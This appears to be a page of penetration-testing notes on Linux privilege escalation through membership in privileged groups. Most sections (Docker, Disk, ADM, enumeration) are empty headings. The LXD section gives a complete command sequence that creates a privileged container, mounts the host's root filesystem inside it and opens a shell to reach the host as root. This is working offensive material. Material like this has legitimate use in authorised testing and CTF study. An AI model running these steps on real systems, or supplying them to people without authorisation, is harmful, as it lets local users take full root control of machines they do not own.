πPrivileged Groups
π― Overview
π³ High-Risk Groups
LXD Group
# Check membership
id | grep lxd
# Create privileged container
lxd init # Use defaults
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine
lxc init alpine r00t -c security.privileged=true
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
lxc start r00t
lxc exec r00t /bin/sh
# Access host filesystem as root
cd /mnt/root/rootDocker Group
Disk Group
ADM Group
π Quick Exploitation
LXD Privilege Escalation
Docker Escalation
Other Dangerous Groups
π Group Enumeration
Check All User Groups
Privileged Group Detection Script
π Quick Reference
Immediate Checks
Emergency Escalation
Last updated